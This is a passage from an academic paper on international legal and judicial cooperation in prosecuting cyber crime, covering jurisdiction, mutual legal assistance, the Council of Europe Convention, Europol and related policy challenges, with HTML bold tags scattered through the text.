determ<strong>in</strong><strong>in</strong>g jurisdiction and f<strong>in</strong>d<strong>in</strong>g effective means of communication. Moreover, a cyber <strong>in</strong>cident is not always<br />
recognised as a crime by both the victim nation and by the nation from which the attack orig<strong>in</strong>ated. It is therefore<br />
clear that a thorough review of substantial and procedural law should be undergone on the national level before<br />
<strong>in</strong>ternational cooperation could be effective, or even possible. This paper focuses on offences aga<strong>in</strong>st data, property<br />
and <strong>in</strong>frastructure and draws attention to the most relevant <strong>in</strong>ternational <strong>in</strong>struments employed <strong>in</strong> prosecut<strong>in</strong>g cyber<br />
crime. Accord<strong>in</strong>g to the firm belief of legal experts work<strong>in</strong>g <strong>in</strong> the area, awareness about such <strong>in</strong>ternational<br />
<strong>in</strong>struments as well as guidance toward proper implementation are immediately required. Hence, this paper offers a<br />
brief <strong>in</strong>troduction to the ma<strong>in</strong> challenges of judicial cooperation <strong>in</strong> the field of cyber crime and, look<strong>in</strong>g toward the<br />
future, describes important trends <strong>in</strong> the doma<strong>in</strong> of <strong>in</strong>ternational crim<strong>in</strong>al cooperation.<br />
Keywords: cyber crime, <strong>in</strong>ternational crim<strong>in</strong>al cooperation, judicial cooperation, <strong>in</strong>formation exchange<br />
1. Introduction<br />
Recent years have witnessed cyber <strong>in</strong>cidents affect<strong>in</strong>g bus<strong>in</strong>esses, government <strong>in</strong>stitutions, nongovernmental<br />
entities and <strong>in</strong>dividuals becom<strong>in</strong>g a daily nuisance. While large-scale cyber <strong>in</strong>cidents such<br />
as Estonia 2007 or Georgia 2008 have raised the question of application of Law of Armed Conflict, and<br />
have <strong>in</strong> general served as a wake-up call to <strong>in</strong>troduce or strengthen <strong>in</strong>formation security regulations (Tikk,<br />
Kaska, Vihul 2009), for the majority of the cases commonly referred to as “cyber attacks”, crim<strong>in</strong>al law is<br />
the most efficient tool to deal with (Kaska, Talihärm, Tikk 2010).<br />
Besides national crim<strong>in</strong>al law, the role of <strong>in</strong>ternational crim<strong>in</strong>al cooperation <strong>in</strong> the context of cyber<br />
<strong>in</strong>cidents has proved to be crucial as the borderless nature of cyber crime requires effective and timely<br />
responses from numerous stakeholders worldwide (Blomfield 2007). Despite the sceptics’ view that cyber<br />
cases are often “non-solvable” by nature, efficient <strong>in</strong>ternational judicial cooperation <strong>in</strong> crim<strong>in</strong>al matters<br />
has proved to be the facilitator of successful outcome of the crim<strong>in</strong>al procedure.<br />
Build<strong>in</strong>g on these assumptions, this article focuses on the <strong>in</strong>ternational cooperation <strong>in</strong> <strong>in</strong>vestigat<strong>in</strong>g and<br />
prosecut<strong>in</strong>g cyber crime. On the one hand, focus<strong>in</strong>g on acts of cyber crime such as offences aga<strong>in</strong>st<br />
data, property and <strong>in</strong>frastructure might seem an unnecessary limitation to the analyses of the doma<strong>in</strong> of<br />
<strong>in</strong>ternational crim<strong>in</strong>al cooperation. However, on the other hand, it is precisely through a comprehensive<br />
overview of the most relevant <strong>in</strong>ternational <strong>in</strong>struments employed <strong>in</strong> prosecut<strong>in</strong>g cyber crimes, that it<br />
becomes possible to identify the unique elements of such cooperation, the prevalent challenges and<br />
appropriate counterparts.<br />
Instead of focus<strong>in</strong>g <strong>in</strong> great detail on any of the particular challenges related to crim<strong>in</strong>al cooperation <strong>in</strong> the<br />
context of cyber crime, this article serves as an <strong>in</strong>troductory account on the doma<strong>in</strong> and draws attention<br />
to major <strong>in</strong>ternational <strong>in</strong>struments as well as related burn<strong>in</strong>g issues. After discuss<strong>in</strong>g the ma<strong>in</strong> challenges<br />
of cyber crime prosecution, the article identifies important trends <strong>in</strong> the area of <strong>in</strong>ternational crim<strong>in</strong>al<br />
cooperation.<br />
2. Conditions for effective <strong>in</strong>ternational cooperation <strong>in</strong> cyber context<br />
Broadly def<strong>in</strong>ed, efficient legislative response to cyber crime encompasses three fields. Firstly, domestic<br />
substantive crim<strong>in</strong>al law def<strong>in</strong>es the prohibited and punishable cyber activities, i.e. it crim<strong>in</strong>alises certa<strong>in</strong><br />
conduct <strong>in</strong> cyberspace. In addition, <strong>in</strong> case a cyber attack is targeted aga<strong>in</strong>st the <strong>in</strong>formation<br />
<strong>in</strong>frastructure of another country, domestic Penal Code is supplemented by legal requirements for e.g.<br />
reta<strong>in</strong><strong>in</strong>g network traffic logs, electronic communications service providers’ duty to cooperation, etc., that<br />
253
Anna-Maria Talihärm<br />
all have impact not only on the results of <strong>in</strong>vestigations, but are <strong>in</strong> a way also the bases for the overall<br />
defence of the nation under attack.<br />
Secondly, domestic crim<strong>in</strong>al procedure law gives the law enforcement and crim<strong>in</strong>al justice system the<br />
necessary tools and means to <strong>in</strong>vestigate, prosecute and adjudicate the activities def<strong>in</strong>ed by substantive<br />
crim<strong>in</strong>al law as cyber crimes. In general, law enforcement activities can be divided <strong>in</strong>to two ma<strong>in</strong> groups:<br />
<strong>in</strong>vestigation of the offences and prosecution of the perpetrators (Walden 2006). Appropriate <strong>in</strong>stitutional<br />
arrangements for the smooth function<strong>in</strong>g of law enforcement agencies and their organisational structure<br />
may have critical <strong>in</strong>fluence on effective law enforcement strategies (Walden 2006), whereas it is<br />
important to underl<strong>in</strong>e that law enforcement structures as such are different around the world and their<br />
function<strong>in</strong>g is <strong>in</strong> most cases based on <strong>in</strong>dividual policies.<br />
Thirdly, besides the harmonisation of domestic legislation, draft<strong>in</strong>g provisions and establish<strong>in</strong>g <strong>in</strong>stitutions<br />
for police and judicial cooperation, a framework for <strong>in</strong>ternational cooperation <strong>in</strong>cludes conclud<strong>in</strong>g relevant<br />
multi- or bilateral agreements or jo<strong>in</strong><strong>in</strong>g the exist<strong>in</strong>g ones (United Nations 1994). Currently, it can be<br />
observed that national legal standards regard<strong>in</strong>g substantive and procedural rules are to some extent<br />
lack<strong>in</strong>g harmonisation. For example, the Council of Europe’s study on the cooperation between law<br />
enforcement agencies and Internet Service Providers (ISPs) concluded that the relationship is short of<br />
even the “clarity on the very concept of cooperation”. (CoE 2008) Naturally, uncerta<strong>in</strong>ties related to legal<br />
aspects and problems with implementation of the exist<strong>in</strong>g agreements are not benefit<strong>in</strong>g <strong>in</strong>ternational<br />
cooperation either.<br />
Furthermore, the doma<strong>in</strong> of <strong>in</strong>ternational crim<strong>in</strong>al cooperation covers a great number of stakeholders as<br />
well various fields of law. Organisations and states play a significant role <strong>in</strong> sett<strong>in</strong>g the stage and<br />
express<strong>in</strong>g political will <strong>in</strong> solv<strong>in</strong>g cases that require <strong>in</strong>ternational cooperation <strong>in</strong> <strong>in</strong>vestigative or<br />
prosecut<strong>in</strong>g phases. Law enforcement agencies, usually public authorities such as <strong>in</strong>vestigation bodies,<br />
police and prosecut<strong>in</strong>g authorities have the primary competence <strong>in</strong> carry<strong>in</strong>g out crim<strong>in</strong>al procedures.<br />
(Walden 2006)<br />
The three above-mentioned elements let us gather that there is an assortment of legal rules – substantive<br />
national law as well as procedural law, and <strong>in</strong>ternational agreements – that need to be <strong>in</strong> place before the<br />
discussion about the possibility of <strong>in</strong>ternational cooperation can grow <strong>in</strong>to a discussion about the<br />
efficiency of cooperation. Therefore, after briefly expla<strong>in</strong><strong>in</strong>g the work of selected <strong>in</strong>ternational<br />
organisations <strong>in</strong> the field of <strong>in</strong>ternational cooperation, the article moves on to more concrete challenges<br />
an trends <strong>in</strong> the areas of jurisdiction, timel<strong>in</strong>ess of response, education and awareness, mandate and<br />
duplication of networks.<br />
3. International cooperation: Major <strong>in</strong>ternational organisations active <strong>in</strong> the field<br />
Generally speak<strong>in</strong>g, <strong>in</strong>ternational cooperation <strong>in</strong> crim<strong>in</strong>al matters is built upon three pillars: multilateral<br />
treaties or conventions, bilateral treaties and relevant regional or organisational regulations. (Ploom<br />
2010) Such legal <strong>in</strong>struments typically conclude the rules upon which one state will provide legal<br />
assistance to another. The agreements may <strong>in</strong>clude provisions concern<strong>in</strong>g the procedure for mak<strong>in</strong>g<br />
requests, conditions on the use of the assistance as well as procedures for refus<strong>in</strong>g the assistance.<br />
Traditionally, a request for <strong>in</strong>ternational cooperation <strong>in</strong> crim<strong>in</strong>al matters does not <strong>in</strong>itiate a national<br />
crim<strong>in</strong>al proceed<strong>in</strong>g <strong>in</strong> the country receiv<strong>in</strong>g the request s<strong>in</strong>ce all the procedural acts rema<strong>in</strong> with<strong>in</strong> the<br />
regulatory framework of the request<strong>in</strong>g country. States may also use the option of enter<strong>in</strong>g a<br />
“reservations” which allows them to opt out from a specific provision and usually <strong>in</strong>dicates the<br />
characteristics of the national law.<br />
Furthermore, there are a great number of <strong>in</strong>ternational organisations and their <strong>in</strong>itiatives that shape the<br />
overall picture of <strong>in</strong>ternational cooperation. As will be shown by the three brief examples below, the<br />
<strong>in</strong>itiatives, their scope, aim and success vary to a great deal and thereby the current state of laws<br />
govern<strong>in</strong>g <strong>in</strong>ternational crim<strong>in</strong>al cooperation is still not wholly harmonized.<br />
Additionally, the question arises whether the versatile legal framework already <strong>in</strong> place effectively tackles<br />
the challenges posed by the asymmetric nature of cyber crime. As mentioned above, there are a number<br />
of <strong>in</strong>ternational legal mechanisms aim<strong>in</strong>g at facilitat<strong>in</strong>g cooperation between nations <strong>in</strong> <strong>in</strong>vestigat<strong>in</strong>g and<br />
prosecut<strong>in</strong>g crim<strong>in</strong>al offences, but so far only a few of them have been put together with specific <strong>in</strong>tention<br />
to regulate the procedural elements of cyber crime.<br />
254
3.1 United Nations<br />
Anna-Maria Talihärm<br />
United Nations Convention aga<strong>in</strong>st Transnational Organized Crime (UN 2000) is United Nations’s ma<strong>in</strong><br />
<strong>in</strong>ternational <strong>in</strong>strument <strong>in</strong> the fight aga<strong>in</strong>st transnational organized crime and <strong>in</strong>volves 147 signatory<br />
countries. The countries that have ratified the Convention commit themselves to tak<strong>in</strong>g a series of<br />
measures aga<strong>in</strong>st transnational organized crime, <strong>in</strong>clud<strong>in</strong>g the creation of domestic crim<strong>in</strong>al offences<br />
such as participation <strong>in</strong> an organized crim<strong>in</strong>al group, the adoption of legal frameworks for extradition,<br />
mutual legal assistance and law enforcement cooperation, and the promotion of tra<strong>in</strong><strong>in</strong>g and technical<br />
assistance for build<strong>in</strong>g or upgrad<strong>in</strong>g the necessary capacity of domestic authorities. (UN 2004) In spite of<br />
the Convention not directly address<strong>in</strong>g cyber crime, the framework set forward is equally applicable to<br />
cyber crime offences.<br />
Moreover, there have been discussions about the UN’s role <strong>in</strong> develop<strong>in</strong>g a purpose-built UN cyber crime<br />
treaty that would be open to ratification <strong>in</strong> all Member States. It is argued that such <strong>in</strong>itiative would not be<br />
unlikely because many of the countries that are advanced <strong>in</strong> <strong>in</strong>formation technology would prefer to<br />
extend the reach of the Council of Europe’s convention to more countries and are struggl<strong>in</strong>g with<br />
common <strong>in</strong>ternational cooperation measures <strong>in</strong>clud<strong>in</strong>g the essential mutual legal assistance. (Broadhurst<br />
2006)<br />
As a recent development, United Nations convened <strong>in</strong> 2011 an UN Intergovernmental Expert Group on<br />
the issues related to cyber crime (<strong>in</strong>clud<strong>in</strong>g crim<strong>in</strong>al cooperation) <strong>in</strong> order to assess the options to<br />
strengthen exist<strong>in</strong>g and to propose new national and <strong>in</strong>ternational legal or other responses to cyber<br />
threats, i.e. to create a multilateral treaty similar to the Council of Europe’s Convention on Cyber Crime<br />
but <strong>in</strong>volv<strong>in</strong>g a larger number of states. By now the states have agreed to undertake an ambitious<br />
comprehensive study on aspects of cyber crime and have scheduled the submission of the study to the<br />
Crime Commission by April 2013. (UNODC 2011)<br />
3.2 Council of Europe<br />
There are several Council of Europe (CoE) conventions that target the issue of cross-border cooperation<br />
<strong>in</strong> crim<strong>in</strong>al matters. One of the most relevant is the Convention on Cybercrime (CoE 2001a) that despite<br />
be<strong>in</strong>g orig<strong>in</strong>ally designed as a regional mechanism has proved to be an <strong>in</strong>strument of global significance<br />
(Keyser 2003). As a downside, even though many <strong>in</strong>ternational organisations are promot<strong>in</strong>g the<br />
Convention, the number of signatory countries is still relatively low. At the time of writ<strong>in</strong>g, 47 countries<br />
had signed and 30 ratified the <strong>in</strong>strument.<br />
As to the overall role of the Convention as a vehicle for <strong>in</strong>ternational cooperation, the preamble of the<br />
Convention claims that the Convention is necessary “for the adoption of powers sufficient for effectively<br />
combat<strong>in</strong>g such crim<strong>in</strong>al offences, by facilitat<strong>in</strong>g their detection, <strong>in</strong>vestigation and prosecution at both the<br />
domestic and <strong>in</strong>ternational levels and by provid<strong>in</strong>g arrangements for fast and reliable <strong>in</strong>ternational cooperation”.<br />
Yet, Article 23 of the Convention rem<strong>in</strong>ds that the Convention’s primary goal is not to become<br />
a central <strong>in</strong>strument for <strong>in</strong>ternational cooperation. Accord<strong>in</strong>g to the Convention, only <strong>in</strong> those cases where<br />
the exist<strong>in</strong>g treaties, laws and arrangements do not already conta<strong>in</strong> such provisions, each Party is<br />
required to establish a legal basis to enable the carry<strong>in</strong>g out of <strong>in</strong>ternational cooperation as def<strong>in</strong>ed by the<br />
Convention.<br />
Besides list<strong>in</strong>g general pr<strong>in</strong>ciples for <strong>in</strong>ternational cooperation, the Convention states procedural<br />
provisions and tools for efficient <strong>in</strong>vestigations (expedited preservation of stored computer data, real-time<br />
collection of computer data, etc.), pr<strong>in</strong>ciples relat<strong>in</strong>g to 24/7 networks, extradition, mutual assistance, and<br />
procedures perta<strong>in</strong><strong>in</strong>g to mutual assistance requests <strong>in</strong> the absence of applicable <strong>in</strong>ternational<br />
agreements.<br />
3.3 European Union and European Police Office (Europol)<br />
The European Union (EU) has traditionally concentrated ma<strong>in</strong>ly on establish<strong>in</strong>g a common <strong>in</strong>ternal<br />
market, and therefore the majority of the legislative effort has been aim<strong>in</strong>g at the harmonization of the<br />
legal landscape for that purpose. However, it also has competence with<strong>in</strong> the justice and home affairs<br />
area (European Union 2000), even more remarkably with the entry <strong>in</strong>to force of the Lisbon Treaty, and<br />
has <strong>in</strong> recent years taken notable <strong>in</strong>itiatives <strong>in</strong> tackl<strong>in</strong>g attacks on <strong>in</strong>formation systems and critical<br />
<strong>in</strong>frastructure (European Union 2005). Due to its regional scope, EU is an effective platform for<br />
255
Anna-Maria Talihärm<br />
<strong>in</strong>troduc<strong>in</strong>g common standards to all Member States and recent developments have <strong>in</strong>dicated that EU is<br />
mov<strong>in</strong>g towards review<strong>in</strong>g and ref<strong>in</strong><strong>in</strong>g its framework of cyber crime.<br />
One of the EU <strong>in</strong>itiatives aim<strong>in</strong>g at harmoniz<strong>in</strong>g cross-border cooperation is the European Police Office<br />
(Europol) that aims to support the EU Member States <strong>in</strong> prevent<strong>in</strong>g and combat<strong>in</strong>g all forms of serious<br />
<strong>in</strong>ternational crime and terrorism, <strong>in</strong>clud<strong>in</strong>g high tech and cyber crime. (European Union 2009) Ma<strong>in</strong>ly,<br />
Europol is tasked to improve the effectiveness and cooperation of competent Member State authorities<br />
and its overall role is to help to achieve a safer Europe by support<strong>in</strong>g EU law enforcement authorities<br />
through the exchange and analysis of crim<strong>in</strong>al <strong>in</strong>telligence. (Europol 2010a)<br />
Regard<strong>in</strong>g its mandate, Europol officers do not entail direct powers of arrest but <strong>in</strong>stead, support the<br />
European law enforcement agencies by gather<strong>in</strong>g, analys<strong>in</strong>g and dissem<strong>in</strong>at<strong>in</strong>g <strong>in</strong>formation and<br />
coord<strong>in</strong>at<strong>in</strong>g operations. Additionally, it appears common practice for Europol’s experts and analysts to<br />
take part <strong>in</strong> Jo<strong>in</strong>t Investigation Teams solv<strong>in</strong>g crim<strong>in</strong>al cases EU-wide.<br />
Importantly, the Council of the European Union decided <strong>in</strong> 2009 to transform Europol <strong>in</strong>to an official EU<br />
agency. Respond<strong>in</strong>g to criticism directed at the lack of transparency and democratic accountability of<br />
Europol (Schaerlaekens 2009), the decision has triggered several changes <strong>in</strong> Europol’s legal framework,<br />
ma<strong>in</strong>ly undertaken <strong>in</strong> order to simplify and improve Europol’s previous structure.<br />
The expansion of Europol’s mandate and focus<strong>in</strong>g to a greater extent on the fight aga<strong>in</strong>st cyber crime<br />
should be regarded as a significant development for EU law enforcement authorities. Europol’s objective<br />
to become the pr<strong>in</strong>cipal EU support centre for law enforcement operations (Europol 2010b), and<br />
proposals to establish the European Union Cybercrime Task Force as well as the European Cybercrime<br />
Centre suggest that EU is seek<strong>in</strong>g to improve and render the current approach to the fight of cyber crime<br />
more effective and consistent.<br />
4. Major challenges and trends<br />
International organisations that were discussed above illustrate the various approaches <strong>in</strong>itiated on<br />
regional and <strong>in</strong>ternational level. However, most of the urgent challenges <strong>in</strong> the field of <strong>in</strong>ternational<br />
cooperation have their roots <strong>in</strong> domestic legislation and the implementation of multilaterally agreed<br />
pr<strong>in</strong>ciples <strong>in</strong> the national framework. Without go<strong>in</strong>g <strong>in</strong>to details with specific procedural problems with<strong>in</strong><br />
the <strong>in</strong>vestigation and prosecution phases, such as search and seizure procedures, expedited<br />
preservation of computer data, disclosure of stored data, <strong>in</strong>terception of content data and collection of<br />
traffic data (Russell et al. 2004), the article lists some of the most common challenges that are connected<br />
with the general aspects of <strong>in</strong>ternational cooperation with<strong>in</strong> the context of cyber crime. These challenges<br />
give way to several trends <strong>in</strong> the <strong>in</strong>ternational crim<strong>in</strong>al cooperation and lead to assumptions on further<br />
developments.<br />
4.1 Jurisdiction<br />
Cyberspace has challenged the fundamental pr<strong>in</strong>ciple of territorial jurisdiction (Brenner 2010) and as the<br />
nature of the Internet disregards national borders, or even encourages diffus<strong>in</strong>g activities over several<br />
countries, crim<strong>in</strong>al <strong>in</strong>vestigations are fac<strong>in</strong>g complex jurisdictional puzzles.<br />
In prosecut<strong>in</strong>g cases of cyber crime the ma<strong>in</strong> problem seems to derive from the nature of modern<br />
computer and telecommunications technology where the structure of networks and methods of data<br />
transmission create an uncerta<strong>in</strong>ly about where the crim<strong>in</strong>alised acts have occurred <strong>in</strong> the first place. A<br />
well-known example of this is the Lev<strong>in</strong> case where Citibank suffered serious breaches of security <strong>in</strong> its<br />
cash management system and the offender was arrested <strong>in</strong> the UK and later extradited to the US. (Cryer<br />
et al. 2007)<br />
Moreover, despite both the offender and attacker resid<strong>in</strong>g <strong>in</strong> the same country, part of the evidence may<br />
still be located <strong>in</strong> a foreign server. Thus, with the option of direct<strong>in</strong>g data traffic through networks located<br />
worldwide, the perpetrators can plan a suitable cyber activity cha<strong>in</strong> where the orig<strong>in</strong> and jurisdiction of<br />
relevant actors would first of all be difficult to determ<strong>in</strong>e and secondly, <strong>in</strong>volve countries with a favourable<br />
profile (Kaska, Tikk, 2009). To tackle this, the harmonisation of the laws address<strong>in</strong>g cyber crime plays an<br />
important role <strong>in</strong> the procedural elements of crim<strong>in</strong>al cooperation as the questions of jurisdiction are<br />
either addressed directly by the national legislation or solved by the <strong>in</strong>terpretation of general <strong>in</strong>ternational<br />
law pr<strong>in</strong>ciples.<br />
256
Anna-Maria Talihärm<br />
However, one should keep <strong>in</strong> m<strong>in</strong>d that for several reasons jurisdiction may end up be<strong>in</strong>g only a formal<br />
element of the problematic <strong>in</strong>ternational prosecution (Brenner, Koops 2004). Recent case studies have<br />
underl<strong>in</strong>ed that even if the undesirable conduct is crim<strong>in</strong>alised <strong>in</strong> the domestic law of the country that<br />
aims to <strong>in</strong>itiate the prosecution as well as <strong>in</strong> a recipient jurisdiction, problems may still occur on a political<br />
level. Therefore, similarly to any other <strong>in</strong>vestigation, the not cooperative political will of the requested<br />
country or entity may significantly slow down or even disable the <strong>in</strong>vestigation and prosecution of any<br />
cyber <strong>in</strong>cident (Tikk, Kaska 2009).<br />
Thereby, the traditional pr<strong>in</strong>ciples of territoriality, nationality and passive personality may no longer be<br />
directly or strictly applicable <strong>in</strong> solv<strong>in</strong>g cyber <strong>in</strong>cidents. Countries seem to be more will<strong>in</strong>g to extend the<br />
reach of relevant offences beyond the traditional jurisdiction pr<strong>in</strong>ciples such as stated <strong>in</strong> the CoE<br />
Convention of Cybercrime, and as suggested by Ian Walden, states are thus los<strong>in</strong>g to some extent the<br />
“de jure control” over their sovereign state and trad<strong>in</strong>g it aga<strong>in</strong>st an extended jurisdictional reach.<br />
(Walden 2006)<br />
4.2 Timel<strong>in</strong>ess of the response<br />
Based on the concerns of relevant national and <strong>in</strong>ternational organisations, one of the key demands <strong>in</strong><br />
transnational <strong>in</strong>vestigations is the immediate reaction of the counterparts <strong>in</strong> the country where the<br />
offender is located. Practice has shown that when it comes to quickly respond<strong>in</strong>g to official requests for<br />
e.g. <strong>in</strong>formation exchange, the traditional <strong>in</strong>struments of mutual legal assistance do not, <strong>in</strong> most cases,<br />
meet the requirements regard<strong>in</strong>g the speed of <strong>in</strong>vestigations <strong>in</strong> the Internet and may thus jeopardize the<br />
<strong>in</strong>vestigation of the offence.<br />
If the location of the attacker has been identified, the least time-consum<strong>in</strong>g way forward usually entails<br />
the cooperation of law enforcement agencies through a jo<strong>in</strong>t <strong>in</strong>vestigation team. Us<strong>in</strong>g <strong>in</strong>formal networks<br />
and contacts might grant a more time-effective response but does not always permit us<strong>in</strong>g such evidence<br />
<strong>in</strong> crim<strong>in</strong>al procedure. This br<strong>in</strong>gs along several problems concern<strong>in</strong>g the usability of evidence that has<br />
not been ga<strong>in</strong>ed via official procedures, and underl<strong>in</strong>es the amount of time that characterises official<br />
requests of mutual legal assistance. Consider<strong>in</strong>g the time-critical nature of cyber crime, six months of<br />
wait<strong>in</strong>g to receive the requested <strong>in</strong>formation through current official procedures, does not satisfy the<br />
needs of <strong>in</strong>vestigation and prosecution of cyber crime. (Pau, 2011)<br />
Similar challenge <strong>in</strong>volves the lack of harmonisation of the legal framework regulat<strong>in</strong>g data retention<br />
requirements for ISPs. Despite the efforts of the EU Data Retention Directive (European Union 2006), the<br />
obligations of ISPs with respect to the retention of certa<strong>in</strong> data may vary to a great degree (Paul, 2011)<br />
and therefore do not always guarantee the availability of such data for the purposes of <strong>in</strong>vestigation,<br />
detection and prosecution.<br />
Among other options, solutions to such issues may <strong>in</strong>clude establish<strong>in</strong>g practical and effective<br />
cooperation networks. Moreover, accord<strong>in</strong>g to CoE’s study, <strong>in</strong> order to render <strong>in</strong>ternational cooperation<br />
more effective, a set of practices should be used to establish uniformity of <strong>in</strong>teractions between different<br />
stakeholders (CoE 2008). A recent example of such cooperation between the Estonian Computer<br />
Emergency Response Team (CERT) and one of the biggest local ISPs shows that public-private<br />
partnership enhances ISPs’ ability to promptly <strong>in</strong>form its customers about possible security threats (Elion<br />
2011). Another example of improv<strong>in</strong>g cooperation between public and private spheres is the Estonian<br />
Cyber Defence League (CDL 2010).<br />
4.3 Education and awareness<br />
Not surpris<strong>in</strong>gly, education and awareness of the complex spectrum of cyber threats form one of the<br />
biggest challenges for effective <strong>in</strong>ternational cooperation. The level of knowledge and expertise varies<br />
with<strong>in</strong> agencies and may cause significant problems <strong>in</strong> communication, quality of <strong>in</strong>formation shar<strong>in</strong>g and<br />
decision-mak<strong>in</strong>g. For example, law enforcement agencies may not have the capacity to develop <strong>in</strong>ternal<br />
expertise that is needed for communication with ISPs (CoE 2008) or the judicial system may not have the<br />
technical knowledge to rightfully <strong>in</strong>terpret the facts of the case.<br />
Similarly, the lack of harmonised measures and procedural rules has rendered the majority of<br />
stakeholders confused regard<strong>in</strong>g the legal framework surround<strong>in</strong>g cyber crime and crim<strong>in</strong>al cooperation.<br />
Law enforcement agencies <strong>in</strong> particular are struggl<strong>in</strong>g with ref<strong>in</strong><strong>in</strong>g the legally and technically possible<br />
measures that can be used <strong>in</strong> <strong>in</strong>vestigat<strong>in</strong>g crimes carried out via or target<strong>in</strong>g at computer systems. One<br />
257
Anna-Maria Talihärm<br />
among the many examples <strong>in</strong> this field is the Spanish case of law enforcement agencies conduct<strong>in</strong>g<br />
warrantless Internet searches with<strong>in</strong> the peer-to-peer file shar<strong>in</strong>g programme <strong>in</strong> order to locate materials<br />
of child pornography. In 2007, the Tarragona Regional Court questioned such police actions and ruled<br />
the defendant to be <strong>in</strong>nocent as the police actions were determ<strong>in</strong>ed by the Court to have caused serious<br />
harm to defendant’s fundamental right to secrecy <strong>in</strong> communications. However, <strong>in</strong> 2008 the Supreme<br />
Court overruled this decision and stated that the purpose of these searches was to unveil the concealed<br />
identity of those who had access to such files, and that the access to such <strong>in</strong>formation, considered illegal<br />
or unlawful, may be carried out by any user s<strong>in</strong>ce the <strong>in</strong>formation is public and had been disclosed by the<br />
user itself. (Europa Press 2008)<br />
Therefore, as underl<strong>in</strong>ed by the UN Intergovernmental Expert Group, there is a cont<strong>in</strong>uous need for more<br />
research, awareness about <strong>in</strong>ternational <strong>in</strong>struments as well as guidance on proper <strong>in</strong>terpretation and<br />
implementation (UNODC 2011).<br />
4.4 Mandate<br />
Analyses of the recent <strong>in</strong>ternational developments have <strong>in</strong>dicated that more and more nations and<br />
<strong>in</strong>stitutions are realiz<strong>in</strong>g the importance of <strong>in</strong>ternational crim<strong>in</strong>al cooperation <strong>in</strong> the context of cyber crime<br />
(Portnoy, Goodman 2009). One proof of this trend is that a grow<strong>in</strong>g number of national Computer<br />
Emergency Response Teams (CERTs) are be<strong>in</strong>g set up and their operational powers are be<strong>in</strong>g<br />
<strong>in</strong>creased. Augment<strong>in</strong>g the mandate of other cyber crime related <strong>in</strong>stitutions is also a clear sign of<br />
governments pay<strong>in</strong>g more attention to the coord<strong>in</strong>ation of <strong>in</strong>ternational cooperation. Recent examples are<br />
the European Union seek<strong>in</strong>g to improve its <strong>in</strong>stitutional framework <strong>in</strong> the field and Estonia follow<strong>in</strong>g the<br />
trend by upgrad<strong>in</strong>g the Estonian Information Centre from a m<strong>in</strong>istry-adm<strong>in</strong>istered state agency <strong>in</strong>to a<br />
government agency with autonomous executive powers. (Pesur 2010)<br />
4.5 Duplication of expert efforts<br />
G8 was one of the first – followed by CoE, Interpol and others – to <strong>in</strong>itiate a 24/7 network of experts of<br />
cyber crime that was designed to facilitate the communication and <strong>in</strong>vestigations of law enforcement<br />
agencies of different jurisdictions. The ma<strong>in</strong> idea of such a network is that even when the prelim<strong>in</strong>ary<br />
communication is on <strong>in</strong>formal bases, it can be carried out <strong>in</strong> a time-critical fashion. In the doma<strong>in</strong> of<br />
transnational crime, such consultation <strong>in</strong> timely manner may greatly facilitate reduc<strong>in</strong>g duplication of<br />
effort, unnecessary <strong>in</strong>convenience for witnesses or possible competition among law enforcement<br />
agencies of the states concerned. (CoE 2001b)<br />
However, there are several concerns regard<strong>in</strong>g the function<strong>in</strong>g of these networks such as the technical<br />
and legal competence of the contact po<strong>in</strong>ts and the need for constantly updated contact <strong>in</strong>formation.<br />
Even of a more urgent problem seems to be the confusion created by the partial overlap of different<br />
networks such as the G8 and CoE contact lists. Despite efforts to merge the two networks, the contacts<br />
lists have rema<strong>in</strong>ed separate due to “a wider scope of functions of 24/7 contact po<strong>in</strong>ts under the<br />
Cybercrime Convention” (T-CY 2010).<br />
The threat of duplication of expert efforts can also be observed <strong>in</strong> the field of crim<strong>in</strong>al procedure, where<br />
one of the ma<strong>in</strong> concerns is obta<strong>in</strong><strong>in</strong>g evidence <strong>in</strong> transnational context. This can be improved by<br />
analyz<strong>in</strong>g the current demands of law enforcement agencies for specific <strong>in</strong>vestigative provisions relat<strong>in</strong>g<br />
to cyber crime and propos<strong>in</strong>g necessary changes to multi- and bilateral agreements. Both formal and<br />
<strong>in</strong>formal networks may benefit <strong>in</strong>ternational cooperation granted that sufficient standards and updated<br />
contact <strong>in</strong>formation for communication are set.<br />
5. Conclusion<br />
Cyber crime does not always <strong>in</strong>volve the traditional elements of a crime and hence, even determ<strong>in</strong><strong>in</strong>g<br />
what should be considered an <strong>in</strong>ternational matter <strong>in</strong> cyber crime cases is not always straightforward. It is<br />
therefore vital that a thorough review of substantial and procedural law be undergone on the national<br />
level before <strong>in</strong>ternational cooperation could be effective, or even possible.<br />
In addition to domestic legislation, <strong>in</strong>vestigat<strong>in</strong>g and prosecut<strong>in</strong>g cyber <strong>in</strong>cidents rarely <strong>in</strong>volves only one<br />
country and the widen<strong>in</strong>g range of cyber crime examples underl<strong>in</strong>es the importance of a global network<br />
and cooperation. The comparison of various <strong>in</strong>ternational <strong>in</strong>struments has proved that multilateral treaties<br />
are the most common and arguably most useful vehicles for harmonis<strong>in</strong>g national material law and<br />
258
Anna-Maria Talihärm<br />
m<strong>in</strong>imis<strong>in</strong>g the differences <strong>in</strong> domestic approaches to substantial cyber crime and relevant procedural<br />
aspects.<br />
However, as illustrated by the small number of ratifications of the Council of Europe Convention of<br />
Cybercrime, the practical applicability of the mentioned legal suggestions <strong>in</strong> the Convention is often<br />
questionable. Therefore, an analysis of alternative <strong>in</strong>ternational vehicles must be undergone and primary<br />
<strong>in</strong>ternational legal obstacles such as the lack of requisite procedural rules and f<strong>in</strong>d<strong>in</strong>g effective means of<br />
communication, addressed.<br />
Additional challenges <strong>in</strong>clude the concerns of jurisdiction that despite possibly be<strong>in</strong>g considered as<br />
merely a formal element on crim<strong>in</strong>al cooperation, still rema<strong>in</strong> the key to ref<strong>in</strong><strong>in</strong>g the scope of <strong>in</strong>ternational<br />
cooperation. It is clear that even if the identification of the source and technical attribution have been<br />
successful, it is <strong>in</strong> the end <strong>in</strong>ternational cooperation that leads to the captur<strong>in</strong>g of the crim<strong>in</strong>al. Lately,<br />
countries seem to be more will<strong>in</strong>g to review the traditional jurisdiction pr<strong>in</strong>ciples <strong>in</strong> order to ga<strong>in</strong> extended<br />
jurisdictional reach.<br />
Also, uncerta<strong>in</strong>ties related to the implementation of the exist<strong>in</strong>g multi- and bilateral agreements are not<br />
benefit<strong>in</strong>g <strong>in</strong>ternational cooperation. In terms of crim<strong>in</strong>al procedure, one of the ma<strong>in</strong> concerns is to<br />
